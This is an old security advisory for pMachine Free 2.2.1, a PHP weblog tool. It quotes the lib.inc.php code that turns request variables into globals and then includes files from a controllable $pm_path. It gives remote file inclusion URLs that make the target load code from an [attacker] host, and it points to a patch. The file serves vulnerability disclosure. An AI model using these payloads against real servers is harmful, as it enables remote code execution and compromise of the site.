pMachine.txt

`Informations :  
°°°°°°°°°°°°°  
Language : PHP  
Version : Free 2.2.1  
Website : http://www.pmachine.com  
Problem : Include() Security Hole  
  
  
PHP Code/Location :  
°°°°°°°°°°°°°°°°°°°  
This will work if register_globals is ON *OR* OFF.  
/pm/lib.inc.php :  
-------------------------------------------------------------  
if (isset($HTTP_COOKIE_VARS))  
{  
while(list($var,$val)=each($HTTP_COOKIE_VARS))  
{  
$$var=$val;  
}  
}  
if (isset($HTTP_GET_VARS))  
{  
while(list($var,$val)=each($HTTP_GET_VARS))  
{  
$$var=$val;  
}  
}  
if (isset($HTTP_POST_VARS))  
{  
while(list($var,$val)=each($HTTP_POST_VARS))  
{  
$$var=$val;  
}  
}  
if (isset($HTTP_SERVER_VARS))  
{  
while(list($var,$val)=each($HTTP_SERVER_VARS))  
{  
$$var=$val;  
}  
}  
  
include ("{$pm_path}config$sfx");  
  
if ($debug == 1)  
error_reporting(E_ALL);  
else  
error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);  
  
include ("{$pm_path}db/db.$database$sfx");  
include ("{$pm_path}db/db.tables$sfx");  
include ("{$pm_path}lib/pmcode.fns$sfx");  
include ("{$pm_path}lib/archives.fns$sfx");  
include ("{$pm_path}lib/benchmark.class$sfx");  
include ("{$pm_path}lib/birthday.fns$sfx");  
include ("{$pm_path}lib/calendar.fns$sfx");  
include ("{$pm_path}lib/category.fns$sfx");  
include ("{$pm_path}lib/censor.fns$sfx");  
include ("{$pm_path}lib/comment.fns$sfx");  
include ("{$pm_path}lib/deprecated.fns$sfx");  
include ("{$pm_path}lib/email.fns$sfx");  
include ("{$pm_path}lib/encoded.email$sfx");  
include ("{$pm_path}lib/forum.fns$sfx");  
include ("{$pm_path}lib/hitcounter.fns$sfx");  
include ("{$pm_path}lib/hittracking.fns$sfx");  
include ("{$pm_path}lib/ip.fns$sfx");  
include ("{$pm_path}lib/linking.fns$sfx");  
include ("{$pm_path}lib/mailinglist.fns$sfx");  
include ("{$pm_path}lib/member.fns$sfx");  
include ("{$pm_path}lib/memberfiles$sfx");  
include ("{$pm_path}lib/message.fns$sfx");  
include ("{$pm_path}lib/minicalendar.fns$sfx");  
include ("{$pm_path}lib/password.fns$sfx");  
include ("{$pm_path}lib/pblock.fns$sfx");  
include ("{$pm_path}lib/search.fns$sfx");  
include ("{$pm_path}lib/shared.fns$sfx");  
include ("{$pm_path}lib/stats.fns$sfx");  
include ("{$pm_path}lib/tellafriend.fns$sfx");  
include ("{$pm_path}lib/timelock.fns$sfx");  
include ("{$pm_path}lib/weblog.fns$sfx");  
include ("{$pm_path}cp/xmlparser$sfx");  
include ("{$pm_path}cp/rss.cp$sfx");  
include ("{$pm_path}xmlrpc/ping.fns$sfx");  
include ("{$pm_path}xmlrpc/xmlrpc.inc");  
---------------------------------------------------------------------  
  
  
Exploit :  
°°°°°°°  
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=.txt with :  
http://[attacker]/config.txt  
or  
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=/badcode.txt   
with :  
http://[attacker]/config/badcode.txt  
  
etc...  
  
  
Patch :  
°°°°°°°  
A patch can be found on http://www.phpsecure.info.  
  
  
More Details In French :  
°°°°°°°°°°°°°°°°°°°°°°  
http://www.frog-man.org/tutos/pMachineFree2.2.1.txt  
  
_________________________________________________________________  
  
  
`